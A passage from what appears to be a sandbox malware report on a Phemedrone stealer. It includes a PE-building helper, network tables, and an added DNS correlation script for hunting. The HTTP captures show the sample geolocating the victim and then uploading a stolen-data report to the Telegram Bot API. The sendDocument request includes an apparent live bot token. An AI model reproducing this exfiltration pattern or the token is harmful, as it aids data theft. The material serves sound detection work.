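    struct.pack_into("<H", buf, opt, 0x10B)                        # PE32 magic
    struct.pack_into("<I", buf, opt + 16, entry_rva)
    struct.pack_into("<I", buf, opt + 28, image_base)
    struct.pack_into("<I", buf, opt + 92, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", buf, opt + 96 + 8 * IAT_DIR, text_rva, 8)
    struct.pack_into("<II", buf, opt + 96 + 8 * CLR_DIR, text_rva + 8, 0x48)
    struct.pack_into("<8sIIII", buf, opt + 0xE0, b".text", text_vsize, text_rva, text_raw, raw_ptr)
    # The native stub occupies the last 6 bytes of .text: jmp dword ptr [0x402000]
    stub_off = raw_ptr + (entry_rva - text_rva)
    buf[stub_off:stub_off + 6] = b"\xff\x25" + struct.pack("<I", image_base + text_rva)
    return bytes(buf)


if __name__ == "__main__":
    print(dotnet_entry_stub(build_sample_pe()))
```

A real sample that has a CLR header but whose entrypoint is not this stub, or whose jump lands outside the IAT, has been tampered with or carries a native pre-loader, which is worth a closer look before trusting the "plain .NET" classification.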
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 22:56:55.140666962 CET | 49704 | 443 | 192.168.2.5 | 104.26.0.100
Oct 30, 2024 22:56:55.140713930 CET | 443 | 49704 | 104.26.0.100 | 192.168.2.5
Oct 30, 2024 22:56:55.140799046 CET | 49704 | 443 | 192.168.2.5 | 104.26.0.100
Oct 30, 2024 22:56:55.186470985 CET | 49704 | 443 | 192.168.2.5 | 104.26.0.100
Oct 30, 2024 22:56:55.186489105 CET | 443 | 49704 | 104.26.0.100 | 192.168.2.5
Oct 30, 2024 22:56:55.805557966 CET | 443 | 49704 | 104.26.0.100 | 192.168.2.5
Oct 30, 2024 22:56:55.805687904 CET | 49704 | 443 | 192.168.2.5 | 104.26.0.100
Oct 30, 2024 22:56:55.975681067 CET | 49704 | 443 | 192.168.2.5 | 104.26.0.100
Oct 30, 2024 22:56:55.975699902 CET | 443 | 49704 | 104.26.0.100 | 192.168.2.5
Oct 30, 2024 22:56:55.976021051 CET | 443 | 49704 | 104.26.0.100 | 192.168.2.5
Oct 30, 2024 22:56:56.024738073 CET | 49704 | 443 | 192.168.2.5 | 104.26.0.100
Oct 30, 2024 22:56:56.455800056 CET | 49704 | 443 | 192.168.2.5 | 104.26.0.100
Oct 30, 2024 22:56:56.503329992 CET | 443 | 49704 | 104.26.0.100 | 192.168.2.5
Oct 30, 2024 22:56:56.636811972 CET | 443 | 49704 | 104.26.0.100 | 192.168.2.5
Oct 30, 2024 22:56:56.636925936 CET | 443 | 49704 | 104.26.0.100 | 192.168.2.5
Oct 30, 2024 22:56:56.636972904 CET | 49704 | 443 | 192.168.2.5 | 104.26.0.100
Oct 30, 2024 22:56:56.642528057 CET | 49704 | 443 | 192.168.2.5 | 104.26.0.100
Oct 30, 2024 22:57:01.222210884 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:01.222244024 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:01.222362995 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:01.222933054 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:01.222959042 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.085925102 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.086008072 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.089993000 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.089999914 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.090277910 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.091294050 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.135361910 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.335410118 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.336842060 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.336859941 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.336973906 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.336991072 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337133884 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337151051 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337263107 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337275028 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337299109 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337307930 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337316990 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337321997 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337419987 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337430000 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337450027 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337456942 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337469101 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337471962 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337488890 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337497950 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337527990 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337527990 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337537050 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337543964 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337558985 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337567091 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.337583065 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337599039 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337646961 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337667942 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.337685108 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349323988 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.349467993 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349478006 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.349490881 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349497080 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.349544048 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349555969 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.349564075 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349574089 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.349585056 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349601984 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349607944 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.349617004 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349617004 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349636078 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349730015 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349742889 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.349764109 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.355895042 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.356033087 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356045961 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.356096029 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356101990 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356134892 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.356184006 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356201887 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.356220961 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356239080 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356316090 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356338024 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356403112 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356518030 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356559038 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356601954 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356618881 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356690884 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356725931 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356744051 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356785059 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.356795073 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Oct 30, 2024 22:57:02.360786915 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:02.361835003 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:04.002902985 CET | 443 | 49705 | 149.154.167.220 | 192.168.2.5
Oct 30, 2024 22:57:04.014559031 CET | 49705 | 443 | 192.168.2.5 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 22:56:55.062736988 CET | 60100 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 22:56:55.071263075 CET | 53 | 60100 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 22:57:01.212483883 CET | 61197 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 22:57:01.221640110 CET | 53 | 61197 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 22:56:55.062736988 CET | 192.168.2.5 | 1.1.1.1 | 0x3ab3 | Standard query (0) | get.geojs.io | A (IP address) | IN (0x0001) | false
Oct 30, 2024 22:57:01.212483883 CET | 192.168.2.5 | 1.1.1.1 | 0x6760 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 22:56:55.071263075 CET | 1.1.1.1 | 192.168.2.5 | 0x3ab3 | No error (0) | get.geojs.io | | 104.26.0.100 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 22:56:55.071263075 CET | 1.1.1.1 | 192.168.2.5 | 0x3ab3 | No error (0) | get.geojs.io | | 104.26.1.100 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 22:56:55.071263075 CET | 1.1.1.1 | 192.168.2.5 | 0x3ab3 | No error (0) | get.geojs.io | | 172.67.70.233 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 22:57:01.221640110 CET | 1.1.1.1 | 192.168.2.5 | 0x6760 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                          • get.geojs.io
                                                                          • api.telegram.org
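The two DNS lookups above are the behavioural core of this sample's network activity: get.geojs.io (a public-IP geolocation service, queried at 22:56:55) and, about six seconds later, api.telegram.org (the Telegram Bot API, contacted over TLS straight afterwards; the burst of client-to-server packets on port 49705 is consistent with an upload). That ordering, "find out where I am, then talk to Telegram", is a useful hunting pattern because neither lookup is suspicious on its own. The script below is an added example and not part of the Joe Sandbox report: it parses DNS query lines laid out like the table above (tab-separated; the lines are constructed, with two extra hosts added for contrast) and flags a host that resolves a geolocation service and then api.telegram.org within a window. The 60-second window and the geolocation services other than get.geojs.io are assumptions.

```python
"""Flag a host that resolves a public-IP geolocation service and then
api.telegram.org shortly afterwards.

Added example, not part of the Joe Sandbox report. The log lines are
constructed in the shape of the report's DNS query table (tab-separated
columns); the 60 s window and the geolocation services other than
get.geojs.io are assumptions chosen for illustration.
"""
import re
from datetime import datetime, timedelta

# Assumed watch-list: get.geojs.io is from the report, the others are common
# "what is my IP" services; extend to taste.
GEO_SERVICES = {"get.geojs.io", "ipinfo.io", "api.ipify.org", "ip-api.com"}
EXFIL_DOMAINS = {"api.telegram.org"}

_TS = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) \w+$")


def parse_ts(text):
    """'Oct 30, 2024 22:56:55.062736988 CET' -> naive datetime (ns truncated to us)."""
    m = _TS.match(text.strip())
    if not m:
        raise ValueError(f"bad timestamp: {text!r}")
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    return base.replace(microsecond=int(m.group(2)[:6].ljust(6, "0")))


def parse_dns_query(line):
    """Columns: Timestamp, Source IP, Dest IP, Trans ID, OP Code, Name, Type, Class, DoH."""
    ts, src, dst, txid, _opcode, name, qtype, _qclass, _doh = line.rstrip("\n").split("\t")
    return {"ts": parse_ts(ts), "src": src, "dst": dst, "txid": txid,
            "name": name.lower().rstrip("."), "type": qtype.split(" ")[0]}


def find_geo_then_exfil(lines, window=timedelta(seconds=60)):
    """One hit per exfil-domain lookup that follows a geolocation lookup from the
    same source IP within `window`. Events are processed in time order."""
    events = sorted((parse_dns_query(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    last_geo = {}            # source IP -> time of its most recent geolocation lookup
    hits = []
    for ev in events:
        if ev["name"] in GEO_SERVICES:
            last_geo[ev["src"]] = ev["ts"]
        elif ev["name"] in EXFIL_DOMAINS:
            geo_ts = last_geo.get(ev["src"])
            if geo_ts is not None and ev["ts"] - geo_ts <= window:
                hits.append({"src": ev["src"], "geo_at": geo_ts, "exfil_at": ev["ts"],
                             "exfil_domain": ev["name"],
                             "delta_s": round((ev["ts"] - geo_ts).total_seconds(), 3)})
    return hits


# Constructed sample: the two queries from the report (192.168.2.5), plus a host
# that only talks to Telegram and a host that only checks its IP; neither of the
# extra hosts should be flagged.
SAMPLE_DNS = [
    "Oct 30, 2024 22:56:55.062736988 CET\t192.168.2.5\t1.1.1.1\t0x3ab3\tStandard query (0)\tget.geojs.io\tA (IP address)\tIN (0x0001)\tfalse",
    "Oct 30, 2024 22:56:58.500000000 CET\t192.168.2.7\t1.1.1.1\t0x1a2b\tStandard query (0)\tapi.telegram.org\tA (IP address)\tIN (0x0001)\tfalse",
    "Oct 30, 2024 22:57:01.212483883 CET\t192.168.2.5\t1.1.1.1\t0x6760\tStandard query (0)\tapi.telegram.org\tA (IP address)\tIN (0x0001)\tfalse",
    "Oct 30, 2024 22:57:30.000000000 CET\t192.168.2.9\t1.1.1.1\t0x0c0d\tStandard query (0)\tapi.ipify.org\tA (IP address)\tIN (0x0001)\tfalse",
]

if __name__ == "__main__":
    for hit in find_geo_then_exfil(SAMPLE_DNS):
        print(f"{hit['src']}: geolocation lookup, then {hit['exfil_domain']} after {hit['delta_s']} s")
```

On the report's own data this yields one hit for 192.168.2.5 with a 6.15 s gap. In production the same correlation runs over resolver or Zeek dns logs, and the window should be tuned to the dwell time you observe; stealers of this kind typically fire both lookups within seconds, while a legitimate Telegram client on a host that happens to have checked its IP will usually sit well outside a tight window.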
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.26.0.100 | 443 | 7140 | C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-30 21:56:56 UTC76OUTGET /v1/ip/geo.json HTTP/1.1
                                                                          Host: get.geojs.io
                                                                          Connection: Keep-Alive
2024-10-30 21:56:56 UTC | 917 | IN | HTTP/1.1 200 OK
                                                                          Date: Wed, 30 Oct 2024 21:56:56 GMT
                                                                          Content-Type: application/json
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          x-request-id: 4e97e5a52dd1ea8c6102e57805ee3032-ASH
                                                                          strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                                          access-control-allow-origin: *
                                                                          access-control-allow-methods: GET
                                                                          pragma: no-cache
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          geojs-backend: ash-01
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZJzhxb1iJDGLOSRbqkK%2BhoiRZI%2BNU%2FH1tYhvmqetOGSm%2F9tLOfDvEHPzssRkiqQHXlKNmkBevNHo%2BW3Xif2cMYsKvyG4gYr64aRwBn%2BmgGrV%2FTKP24aAj256bMUBrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: cloudflare
                                                                          CF-RAY: 8daea87d4d1be534-DFW
                                                                          alt-svc: h3=":443"; ma=86400
2024-10-30 21:56:56 UTC | 358 | IN | Data Raw: 31 35 66 0d 0a 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 61 73 6e 22 3a 38 31 30 30 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 38 31 30 30 20 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 43 68 69 63 61 67 6f 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 72 65 67
                                                                          Data Ascii: 15f{"ip":"173.254.250.78","organization_name":"ASN-QUADRANET-GLOBAL","asn":8100,"organization":"AS8100 ASN-QUADRANET-GLOBAL","area_code":"0","timezone":"America\/Chicago","country_code":"US","country_code3":"USA","continent_code":"NA","accuracy":20,"reg
2024-10-30 21:56:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 149.154.167.220 | 443 | 7140 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-30 21:57:02 UTC | 384 | OUT | POST /bot6217988193:AAFiJwdcFHDuCM08fAA_dnBQZGLDPSVjUQY/sendDocument HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                                          Content-Type: multipart/form-data; boundary=----------------------------8dcf90c40a3b06a
                                                                          Host: api.telegram.org
                                                                          Content-Length: 722595
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
2024-10-30 21:57:02 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 30 63 34 30 61 33 62 30 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 70 68 65 6d 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 44 a7 1d 7c 1f ee e2 1c 34 a6 81 45 94 c8 2d fd 5b 70 13 2d 9a 75 0e 62 d0 5e fd 64 da 73 d0 b5 28 ab dc 7f 40 f0 7e a6 2d 22 f9 b0 de 4a ad f1 49 8f 40 1f 39 cb cb 3e b4 ff 12 79 83 48 20
                                                                          Data Ascii: ------------------------------8dcf90c40a3b06aContent-Disposition: form-data; name="document"; filename="[US]173.254.250.78-Phemedrone-Report.phem"Content-Type: application/octet-streamD|4E-[p-ub^ds(@~-"JI@9>yH
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: fd ac f6 0e 83 2a f4 9f 44 ef 11 93 06 57 17 77 ea 3a ea 34 f9 36 9c 19 1f 2b 6d 7b d4 e9 37 a4 40 5a a5 19 8e 2e ef 44 e3 30 c7 fe a9 b1 bf a8 26 10 6d 32 38 de 0b 8e 67 10 df 50 42 d1 57 5f 61 1d 2d b0 16 b0 2f 0b 9f 98 23 71 ab a5 73 87 c4 a9 62 ae 01 3f b2 ed 12 66 2f 6d 69 24 f4 3a 86 24 01 c7 7e aa 8b 37 2c ea bf 11 4e c3 bd 62 b2 73 ff 9a dc 06 4c 9a 2b 62 65 14 dc b5 02 64 50 60 23 0d 20 96 6f 97 bd 1c 6a ff 4b 15 5f 97 4f 7c 85 ed b4 4c 97 4b 42 2c dc 77 10 60 5d 31 06 8e d4 10 5a 69 76 ba f8 3c f0 28 a8 9d 02 af 8d 84 f0 10 07 6e da 27 1c 3f 91 ac 27 96 85 2e 32 57 8b 04 28 9a 9d 63 6b 3a 5f f7 31 aa d7 85 ca 59 be f7 4e 6a 1c 8b 03 e3 50 6b c2 46 b1 56 a7 20 40 96 ae d2 c9 5b c7 66 7c ee 9d d0 45 fe 1b d9 cb 1f 40 b0 03 cc 8f bd 26 2d 88 d2 15
                                                                          Data Ascii: *DWw:46+m{7@Z.D0&m28gPBW_a-/#qsb?f/mi$:$~7,NbsL+bedP`# ojK_O|LKB,w`]1Ziv<(n'?'.2W(ck:_1YNjPkFV @[f|E@&-
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 7e e5 4b 0c f4 2d 84 21 f9 ba 85 ab b6 3e 5b ab 50 7d f1 83 e1 3e 20 23 7e 05 d7 e1 b5 4f 86 67 f1 40 c2 05 39 72 68 12 bb f8 e6 21 a1 1c d9 4f 44 76 e5 7f 32 e9 af b9 37 5b a7 c5 2d 56 8a 64 49 62 7f b8 ae aa 23 c3 6e 1d 39 c3 0c a1 12 0b ec d7 59 38 93 96 87 35 f3 b2 70 19 97 e0 db 63 6a a2 6a 2e bf 98 ec 57 33 89 c9 13 d2 a3 27 e2 35 e2 17 48 e1 16 07 b3 f8 ad 5f b9 2a 21 06 1b 6a 63 02 7e 0e 88 fc 13 56 15 78 8a 3b f6 bb 2a b0 1d 93 16 2f 48 b9 42 de 45 a4 9a 06 4b c8 9b a7 71 d0 d5 d1 7e 8c 68 3a b1 c2 ce cb 38 59 20 26 e3 61 0d b0 1f 4e b1 9c 9a 90 35 71 59 fc 68 fd c5 da 77 19 0b b9 32 e5 ff 02 e5 88 f9 14 f3 a5 08 31 4a c3 85 52 b1 71 4d c5 39 b1 f8 40 1f ec c1 06 4a ae 87 40 7a e3 d4 e8 c2 aa 6b 19 c5 35 1f 71 90 8e 39 3b 4a 5f c1 69 15 4b 8e 77
                                                                          Data Ascii: ~K-!>[P}> #~Og@9rh!ODv27[-VdIb#n9Y85pcjj.W3'5H_*!jc~Vx;*/HBEKq~h:8Y &aN5qYhw21JRqM9@J@zk5q9;J_iKw
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 28 32 c3 ab aa 87 fc 2e 8c 9f 4a 73 f7 f4 07 12 26 27 f0 13 cb a6 fd e0 ad 2e a1 00 20 26 96 20 91 46 f3 a7 4a 35 3e 3a 0e 49 25 00 9a 7e 3a 82 fa 25 04 3c 96 3b 86 4f cd 59 0b 29 2c 49 3f 95 94 dc c8 a6 87 eb 67 2e 90 36 d4 df 30 26 97 87 ed 44 d7 85 f6 f7 8f e0 57 8e 2c 6b dd 0d 70 34 e6 d3 85 ba 20 6a c6 95 99 9a 88 6e 34 e4 b7 c8 36 a0 0e f2 b3 33 f4 07 44 c1 99 93 be 1d 3b 50 3d bd 61 01 92 10 5c 1b 92 6f 48 a9 d7 cc 21 2b 80 15 6c 43 c9 a3 5d 55 5d a0 9e 86 c0 14 53 56 c7 d6 2a ce ab 65 bf a5 17 f3 96 29 e6 f5 41 8a 2d e9 c6 df c5 e5 6c 10 1d 01 a3 b1 9a df e6 42 8d b1 85 53 17 b7 fb 63 dd ee 21 cf 4a 8f cc 35 d1 f3 57 69 76 87 c8 e3 da db af 23 b7 b5 95 73 8e d7 51 36 7d db 45 1c 22 b8 0b 6f 48 b0 e1 82 28 c1 d6 6d 1e 19 bd 6e 11 f2 9f d5 87 97 b8
                                                                          Data Ascii: (2.Js&'. & FJ5>:I%~:%<;OY),I?g.60&DW,kp4 jn463D;P=a\oH!+lC]U]SV*e)A-lBSc!J5Wiv#sQ6}E"oH(mn
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: d7 94 df 50 f0 5b e1 24 6a d6 c4 47 82 11 2f 20 ce f3 bc 14 91 c0 19 4d 73 05 5c 3b 59 c6 77 b9 87 27 d9 a7 e0 01 91 bd 6d eb 24 2c a3 b3 df 94 d6 b4 d2 9b 07 f3 4a d0 53 28 ed 79 33 bd 08 04 b0 dc e6 39 0d 61 49 83 a5 7b e7 70 62 56 91 2d 93 75 e3 eb 45 19 cf ae 4c 9d 78 07 64 39 da 16 b3 99 ad 71 d6 ed 49 26 cc f1 77 25 d9 17 35 dd f9 d1 28 0a f9 f2 84 cd 53 69 00 55 3f ff c7 93 1b ff 55 a1 52 09 ef 65 5a 69 13 75 d1 b4 c9 2d e5 f0 a7 88 23 bf 12 e8 29 1d a1 7e c3 8c 55 a3 d6 20 96 cb 7f bd f7 a0 bb d8 61 a2 fa 05 1d 76 ab 56 e8 19 b7 68 4c 58 32 ae 7e 84 67 3d 99 ee 84 2e 0a 22 c0 3a f0 92 1b 65 c8 1c 18 19 1f ac 25 94 b2 7b 9c 03 37 36 87 c7 36 a6 1d b8 d4 38 ca eb fd f9 b5 02 11 24 cf 55 78 fc f2 85 a0 8d 6b 87 66 f1 0b af cc e3 3f 99 e1 1b 67 ed 75
                                                                          Data Ascii: P[$jG/ Ms\;Yw'm$,JS(y39aI{pbV-uELxd9qI&w%5(SiU?UReZiu-#)~U avVhLX2~g=.":e%{7668$Uxkf?gu
